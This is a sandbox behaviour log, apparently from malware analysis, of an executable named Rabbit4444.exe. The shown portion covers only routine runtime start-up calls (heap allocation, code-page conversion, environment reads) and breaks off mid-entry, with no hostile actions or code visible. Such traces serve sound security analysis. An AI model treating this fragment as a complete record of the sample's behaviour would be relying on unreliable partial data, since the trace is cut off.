# Flog Txt Version 1 # Analyzer Version: 3.0.2 # Analyzer Build Date: Jul 9 2019 16:03:52 # Log Creation Date: 22.07.2019 06:00:38.664 Process: id = "1" image_name = "rabbit4444.exe" filename = "c:\\users\\fd1hvy\\desktop\\rabbit4444.exe" page_root = "0x71234000" os_pid = "0xcdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\Rabbit4444.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xe84 [0035.012] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0035.013] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x74ea0000 [0035.013] GetProcAddress (hModule=0x74ea0000, lpProcName="InitializeCriticalSectionEx") returned 0x74f97060 [0035.014] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x74ea0000 [0035.014] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsAlloc") returned 0x74f9bea0 [0035.014] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsSetValue") returned 0x74f92550 [0035.015] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x74ea0000 [0035.015] GetProcAddress (hModule=0x74ea0000, lpProcName="InitializeCriticalSectionEx") returned 0x74f97060 [0035.015] GetProcessHeap () returned 0xe0000 [0035.015] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x74ea0000 [0035.016] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsAlloc") returned 0x74f9bea0 [0035.016] GetLastError () returned 0xcb [0035.016] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsGetValue") returned 0x74f870c0 [0035.016] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x364) returned 0xfd278 [0035.016] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsSetValue") returned 0x74f92550 [0035.016] SetLastError (dwErrCode=0xcb) [0035.016] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc00) returned 0xfe728 [0035.031] GetStartupInfoW (in: lpStartupInfo=0x6ff78c | out: lpStartupInfo=0x6ff78c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\Rabbit4444.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0035.031] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0035.031] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0035.031] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0035.031] GetCommandLineA () returned="\"C:\\Users\\FD1HVy\\Desktop\\Rabbit4444.exe\" " [0035.031] GetCommandLineW () returned="\"C:\\Users\\FD1HVy\\Desktop\\Rabbit4444.exe\" " [0035.032] GetLastError () returned 0xcb [0035.032] SetLastError (dwErrCode=0xcb) [0035.032] GetLastError () returned 0xcb [0035.039] SetLastError (dwErrCode=0xcb) [0035.039] GetACP () returned 0x4e4 [0035.039] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x220) returned 0xfbf30 [0035.039] IsValidCodePage (CodePage=0x4e4) returned 1 [0035.039] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x6ff7bc | out: lpCPInfo=0x6ff7bc) returned 1 [0035.039] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x6ff084 | out: lpCPInfo=0x6ff084) returned 1 [0035.039] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x6ff698, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.039] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x6ff698, cbMultiByte=256, lpWideCharStr=0x6fee28, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.039] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x6ff098 | out: lpCharType=0x6ff098) returned 1 [0035.039] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x6ff698, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.039] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x6ff698, cbMultiByte=256, lpWideCharStr=0x6fedd8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.039] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x74ea0000 [0035.039] GetProcAddress (hModule=0x74ea0000, lpProcName="LCMapStringEx") returned 0x74f7ed00 [0035.039] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0035.039] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x6febc8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0035.040] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x6ff598, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x5b\xb4\x12\xaf\xd4\xf7\x6f", lpUsedDefaultChar=0x0) returned 256 [0035.040] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x6ff698, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.040] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x6ff698, cbMultiByte=256, lpWideCharStr=0x6fede8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.040] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0035.040] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x6febd8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0035.040] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x6ff498, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x5b\xb4\x12\xaf\xd4\xf7\x6f", lpUsedDefaultChar=0x0) returned 256 [0035.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x80) returned 0xe6700 [0035.040] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x13febb0, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\Rabbit4444.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\rabbit4444.exe")) returned 0x26 [0035.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x2f) returned 0xf7aa8 [0035.040] RtlInitializeSListHead (in: ListHead=0x13feae0 | out: ListHead=0x13feae0) [0035.040] GetLastError () returned 0x0 [0035.040] SetLastError (dwErrCode=0x0) [0035.040] GetEnvironmentStringsW () returned 0xff330* [0035.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0035.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x565) returned 0xffe08 [0035.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0xffe08, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0035.040] FreeEnvironmentStringsW (penv=0xff330) returned 1 [0035.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x94) returned 0xee850 [0035.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x1f) returned 0xeaf88 [0035.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x28) returned 0xf5450 [0035.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x37) returned 0xf2db0 [0035.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x3c) returned 0xf25b0 [0035.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x31) returned 0xf3430 [0035.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x14) returned 0xf6708 [0035.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x24) returned 0xf54b0 [0035.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xd) returned 0xfcfc0 [0035.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x17) returned 0xf6aa8 [0035.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x2b) returned 0xf75a0 [0035.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x15) returned 0xf6988 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x17) returned 0xf6a08 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x22) returned 0xf5660 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, 